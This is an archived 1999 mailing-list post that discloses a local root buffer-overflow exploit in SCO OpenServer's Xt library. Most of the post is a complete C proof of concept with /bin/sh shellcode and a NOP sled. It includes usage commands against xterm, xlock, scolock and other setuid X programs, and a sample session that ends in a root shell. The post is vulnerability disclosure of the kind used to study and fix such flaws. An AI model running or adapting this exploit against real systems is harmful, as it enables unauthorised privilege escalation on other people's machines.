SCO 5.0.x Xt lib exploit

From: Brock Tellier (btellierat_private)
Date: Tue Sep 14 1999 - 13:42:52 PDT

Next message: Dan Astoorian: "Re: Multiple vulnerabilities in CDE"

Previous message: Arturo Busleiman: "Re: CGI security"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Greetings,

    As I mentioned in an earlier post, virtually all of SCO's programs
using the Xt library are vulnerable to a local root exploit.  The proofs
of concept follow:

They all go something like this:

scobox:/tmp_mnt/home/btellier$ uname -a
SCO_SV scobox 3.2 5.0.5 i386
scobox:/tmp_mnt/home/btellier$ id
uid=136(btellier) gid=100(devel) groups=100(devel),998(www)
scobox:/tmp_mnt/home/btellier$ xmcd -bg `./sco_xt -9000 2200`
Generic SCO Xt library overflow program
  By Brock Tellier btellierat_private

using jmp addr: 0x8047878
Warning: Color name
...
...

Warning: some arguments in previous message were lost
#



--- cut ---
/*
 * Generic SCO Xt library overflow program by Brock Tellier
btellierat_private
 * Tested on SCO 5.0.5+Skunkware98
 * All programs using the Xt library are believed vulnerable
 *
   Compile gcc -o sco_xt sco_xt.c
   Usage: /usr/bin/X11/scolock -bg `./sco_xt -9000 2000`
          /usr/bin/X11/xmcd -bg `./sco_xt -8500 2000`
   /usr/bin/X11/xlock -bg `./sco_xt -8500 2000`
   /usr/bin/X11/xterm -bg `./sco_xt -9000 2000`

 * NOTE: xscreensaver and xload are vulnerable to the overflow but drop
 * privs before the overflow occurs.  Of course, they were suid auth so
that
 * they could read /etc/shadow and thus your shellcode could exploit
something
 * along those lines.  I got shells out of them by doing:
   /usr/bin/X11/xscreensaver -bg `./sco_xt -8404 2200`
   /usr/bin/X11/xload -bg `./sco_xt -8404 2200`
 */


#include <stdlib.h>
#include <stdio.h>

char scoshell[]= /* dobleat_private */
"\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
"\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
"\xff\xff/bin/sh\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";


#define LEN 10000
#define NOP 0x90

unsigned long get_sp(void) {

__asm__("movl %esp, %eax");

}


int main(int argc, char *argv[]) {

long int offset=0;

int i;
int buflen = LEN;
long int addr;
char buf[LEN];

if(argc < 3) {
 fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]);
 exit(0);
}
else {
 offset=atoi(argv[1]);
        buflen=atoi(argv[2]);
}


addr=get_sp();

fprintf(stderr, "Generic SCO Xt library overflow program\n");
fprintf(stderr, "By Brock Tellier btellierat_private\n\n");
fprintf(stderr, "Using addr: 0x%x\n", addr-offset);


memset(buf,NOP,buflen);
memcpy(buf+(buflen/2),scoshell,strlen(scoshell));
for(i=((buflen/2) + strlen(scoshell))+4;i<buflen-4;i+=4)
 *(int *)&buf[i]=addr-offset;

for(i=0;i<buflen;i++)
 putchar(buf[i]);

exit(0);
}
--- cut ---

Next message: Dan Astoorian: "Re: Multiple vulnerabilities in CDE"
Previous message: Arturo Busleiman: "Re: CGI security"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:03:55 PDT